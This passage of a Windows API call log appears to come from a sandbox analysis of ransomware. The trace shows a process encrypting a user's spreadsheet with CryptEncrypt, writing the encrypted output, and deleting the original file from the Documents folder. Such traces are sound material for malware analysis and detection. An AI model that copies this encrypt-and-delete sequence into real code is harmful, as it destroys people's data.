lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.118] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0223.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabb78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0223.118] CryptEncrypt (in: hKey=0x9e1eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a9b580*, pdwDataLen=0x8cef60*=0x5c0d, dwBufLen=0x5c10 | out: pbData=0x2a9b580*, pdwDataLen=0x8cef60*=0x5c10) returned 1 [0223.119] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.119] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.119] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.119] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.119] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.119] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.119] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.119] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.119] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.119] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0223.119] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.119] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.119] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.119] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.119] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.119] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.119] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.120] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.120] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.120] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.120] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.120] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.120] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.120] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.120] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.120] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.120] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.122] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.122] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.122] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.122] WriteFile (in: hFile=0x4f4, lpBuffer=0x2a8a138*, nNumberOfBytesToWrite=0x5c10, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a138*, lpNumberOfBytesWritten=0x8cf5e4*=0x5c10, lpOverlapped=0x0) returned 1 [0223.123] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.123] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.123] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0223.123] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.123] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0223.123] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.123] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.123] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.123] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0223.123] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.123] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0223.123] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0223.123] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0223.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab860, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0223.123] CryptDestroyKey (hKey=0x9e1eb8) returned 1 [0223.124] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.124] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.124] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.124] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.124] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0223.124] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.124] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.124] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.124] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.124] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.124] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.124] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.126] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.126] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.126] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.126] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.126] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.126] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.126] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.126] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.126] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.126] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.126] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.126] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.126] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.126] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.126] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0223.126] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.126] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.126] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.126] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.126] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.126] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.126] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.127] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.127] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.127] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.127] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.127] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.127] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.127] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.127] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.127] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.127] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.127] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.127] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.127] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.127] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.127] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.127] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.127] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.127] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.127] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0223.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7140, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0223.127] CryptReleaseContext (hProv=0xa7bc48, dwFlags=0x0) returned 1 [0223.127] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.127] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.128] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.128] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.128] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.128] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.128] FreeLibrary (hLibModule=0x76390000) returned 1 [0223.128] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.128] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.128] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.128] CloseHandle (hObject=0x4b0) returned 1 [0223.129] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.129] CloseHandle (hObject=0x4f4) returned 1 [0223.131] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.131] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.131] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0223.131] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0223.132] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/_wc0ld1_h 9LSGLE.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\_wc0ld1_h 9LSGLE.xlsx", lpFilePart=0x8cedf4*="_wc0ld1_h 9LSGLE.xlsx") returned 0x2f [0223.132] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\_wc0ld1_h 9LSGLE.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\_wc0ld1_h 9lsgle.xlsx")) returned 0x20 [0223.132] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\_wc0ld1_h 9LSGLE.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd1ad9f0, ftCreationTime.dwHighDateTime=0x1d56740, ftLastAccessTime.dwLowDateTime=0xdb3b54e0, ftLastAccessTime.dwHighDateTime=0x1d5cd64, ftLastWriteTime.dwLowDateTime=0xdb3b54e0, ftLastWriteTime.dwHighDateTime=0x1d5cd64, nFileSizeHigh=0x0, nFileSizeLow=0x5c0d, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="_wc0ld1_h 9LSGLE.xlsx", cAlternateFileName="_WC0LD~1.XLS")) returned 0x9e2138 [0223.132] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\_wc0ld1_h 9LSGLE.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\_wc0ld1_h 9lsgle.xlsx")) returned 1 [0223.156] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd1ad9f0, ftCreationTime.dwHighDateTime=0x1d56740, ftLastAccessTime.dwLowDateTime=0xdb3b54e0, ftLastAccessTime.dwHighDateTime=0x1d5cd64, ftLastWriteTime.dwLowDateTime=0xdb3b54e0, ftLastWriteTime.dwHighDateTime=0x1d5cd64, nFileSizeHigh=0x0, nFileSizeLow=0x5c0d, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="_wc0ld1_h 9LSGLE.xlsx", cAlternateFileName="_WC0LD~1.XLS")) returned 0 [0223.156] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0223.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854e48 | out: hHeap=0x2af0000) returned 1 [0223.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0223.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0223.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0223.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0223.156] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0223.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0223.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0223.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0223.157] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0223.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab080 [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0223.157] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0223.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0223.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0223.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0223.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0223.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0223.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0223.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0223.157] HeapFree (in: hHeap=0x2af0000, 